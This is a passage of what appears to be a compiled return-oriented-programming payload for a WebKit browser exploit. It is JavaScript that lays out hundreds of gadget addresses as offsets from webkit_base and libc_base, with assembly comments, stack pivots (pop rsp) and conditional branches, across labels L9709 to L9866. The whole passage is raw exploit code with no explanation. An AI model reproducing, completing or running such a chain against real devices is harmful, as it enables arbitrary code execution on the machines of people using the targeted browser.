db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L9709:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9710:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+453976, //L9713
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+454008, //L9715
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+453960, //L9712
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9712:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L9713:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9714:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9715:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+454120, //L9716+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+454112, //L9716
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L9716:
db([0, 0]); // 0x0
set_gadgets([
ropchain+454136, //L9716+24
ropchain+455512, //L9711
libc_base+764760, //pop rsi
ropchain+454176, //L9717
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9717:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9719:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+454296, //L9722
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+454280, //L9720
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9720:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9722:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+454456, //L9726
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+454408, //L9723
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+454424, //L9724
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9723:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9724:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9725:
db([8, 0]); // 0x8
set_gadget(libc_base+759608,); //pop rax
//L9726:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+454512, //L9727
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9727:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9729:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+454632, //L9730
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+454648, //L9732
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9730:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9732:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+454824, //L9735
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+454840, //L9736
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+454792, //L9733
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+454808, //L9734
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9733:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L9734:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9735:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9736:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+454920, //L9737
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+454936, //L9738
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L9737:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9738:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+455016, //L9739
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+455032, //L9740
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L9739:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9740:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+455192, //L9744
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+455160, //L9742
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+455176, //L9743
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9741:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L9742:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9743:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9744:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+455248, //L9746
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L9746:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+455376, //L9748
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+455392, //L9749
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+455360, //L9747
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9747:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L9748:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9749:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+455488, //L9752
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+455472, //L9751
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L9751:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9752:
db([0, 0]); // 0x0
set_gadgets([
libc_base+782311, //pop rsp
ropchain+458928, //L9750
//L9711:
libc_base+764760, //pop rsi
ropchain+455552, //L9753
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9753:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9755:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+455672, //L9758
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+455656, //L9756
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9756:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9758:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+455848, //L9761
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+455864, //L9762
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+455816, //L9759
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+455832, //L9760
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9759:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L9760:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9761:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9762:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+455960, //L9764
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+455944, //L9763
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L9763:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9764:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L9765:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L9766:
db([7, 0]); // 0x7
set_gadget(libc_base+763368,); //pop rcx
//L9767:
db([7, 0]); // 0x7
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+456160, //L9769
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9769:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+456216, //L9770
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9770:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+456352, //L9774
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+456336, //L9773
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9772:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L9773:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9774:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+456488, //L9777
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+456520, //L9779
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+456472, //L9776
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9776:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L9777:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9778:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9779:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+456632, //L9780+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+456624, //L9780
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L9780:
db([0, 0]); // 0x0
set_gadgets([
ropchain+456648, //L9780+24
ropchain+458024, //L9775
libc_base+764760, //pop rsi
ropchain+456688, //L9781
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9781:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9783:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+456808, //L9786
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+456792, //L9784
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9784:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9786:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+456968, //L9790
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+456920, //L9787
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+456936, //L9788
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9787:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9788:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9789:
db([8, 0]); // 0x8
set_gadget(libc_base+759608,); //pop rax
//L9790:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+457024, //L9791
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9791:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9793:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+457144, //L9794
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+457160, //L9796
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9794:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9796:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+457336, //L9799
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+457352, //L9800
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+457304, //L9797
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+457320, //L9798
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9797:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L9798:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9799:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9800:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+457432, //L9801
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+457448, //L9802
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L9801:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9802:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+457528, //L9803
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+457544, //L9804
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L9803:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9804:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+457704, //L9808
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+457672, //L9806
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+457688, //L9807
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9805:
db([16, 0]); // 0x10
set_gadget(webkit_base+3236123,); //pop r9
//L9806:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9807:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9808:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+457760, //L9810
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L9810:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+457888, //L9812
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+457904, //L9813
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+457872, //L9811
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9811:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L9812:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9813:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+458000, //L9816
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+457984, //L9815
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L9815:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9816:
db([0, 0]); // 0x0
set_gadgets([
libc_base+782311, //pop rsp
ropchain+458928, //L9814
//L9775:
libc_base+764760, //pop rsi
ropchain+458064, //L9817
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9817:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9819:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+458184, //L9822
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+458168, //L9820
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9820:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9822:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+458344, //L9826
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+458296, //L9823
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+458312, //L9824
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9823:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9824:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9825:
db([8, 0]); // 0x8
set_gadget(libc_base+759608,); //pop rax
//L9826:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+458400, //L9827
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9827:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9829:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+458520, //L9830
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+458536, //L9832
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9830:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9832:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+458712, //L9835
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+458728, //L9836
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+458680, //L9833
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+458696, //L9834
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9833:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L9834:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9835:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9836:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+458808, //L9837
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+458824, //L9838
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L9837:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9838:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+458920, //L9840
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+458904, //L9839
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L9839:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9840:
db([0, 0]); // 0x0
//L9814:
//L9750:
set_gadgets([
libc_base+764760, //pop rsi
ropchain+458968, //L9841
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9841:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9843:
db([4294967228, 4294967295]); // -0x44
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L9845:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+459128, //L9848
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+459112, //L9846
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9846:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9848:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+459304, //L9851
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+459320, //L9852
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+459272, //L9849
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+459288, //L9850
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9849:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L9850:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9851:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9852:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+459416, //L9854
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+459400, //L9853
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L9853:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9854:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+459496, //L9855
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9855:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9857:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+459616, //L9860
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+459600, //L9858
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9858:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9860:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+459792, //L9863
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+459808, //L9864
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+459760, //L9861
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+459776, //L9862
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9861:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L9862:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9863:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9864:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+459904, //L9866
webkit_base+660161, //mov [rsi], rax ; mov al, 1
